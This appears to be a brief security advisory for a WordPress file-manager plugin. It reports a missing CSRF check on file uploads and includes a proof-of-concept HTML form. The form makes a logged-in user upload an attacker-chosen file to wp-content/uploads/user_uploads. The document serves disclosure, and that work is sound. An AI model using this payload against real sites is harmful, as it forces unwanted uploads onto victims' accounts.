The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in users upload files on their behalf
<form action="https://example.com.com/wp-admin/admin-ajax.php?action=wpfm_upload_file" method="POST" enctype="multipart/form-data">
<input type="file" name="file" value="">
<input type="text" name="_file" value="payload.pdf">
<input type="submit" name="submit" value="submit">
</form>
The file won't show up via the frontend/backend, but will be uploaded in the user folder (ie in wp-content/uploads/user_uploads/<usernname>/payload.pdf)